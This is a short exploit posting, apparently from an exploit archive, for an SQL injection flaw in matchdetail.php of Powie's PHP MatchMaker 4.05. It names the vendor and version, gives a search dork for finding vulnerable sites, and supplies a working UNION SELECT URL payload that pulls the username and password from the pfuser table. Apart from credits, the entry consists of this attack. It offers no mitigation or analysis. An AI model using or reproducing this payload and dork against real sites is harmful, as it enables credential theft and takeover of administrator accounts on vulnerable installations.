Powies MatchMaker 4.05 SQL Injection Vulnerabilit
Powies MatchMaker 4.05 (matchdetail.php) SQL Injection Vulnerability
#Powie's PHP MatchMaker <= v4.05 (matchdetail) Remote SQL Injection Exploit
#Critical Level : Dangerous
#Venedor site : http://www.powie.de
#Version : v4.05
#DORK : "Powie's PSCRIPT MatchMaker 4.05"
#Exploit :
#http://target.com/(path to script)/matchdetail.php?edit=-1 UNION SELECT 0,0,0,pwd,0,0,0,0,0,username,0,0,0,0 FROM pfuser WHERE id=1
#Discoverd By : SHiKaA
#Thx To : Str0ke & SuperRomio & XoRon & MDx & Simo
# sPECial THanks to : CaMpA , [emailΒ protected]
# 0day.today [2018-03-02] #
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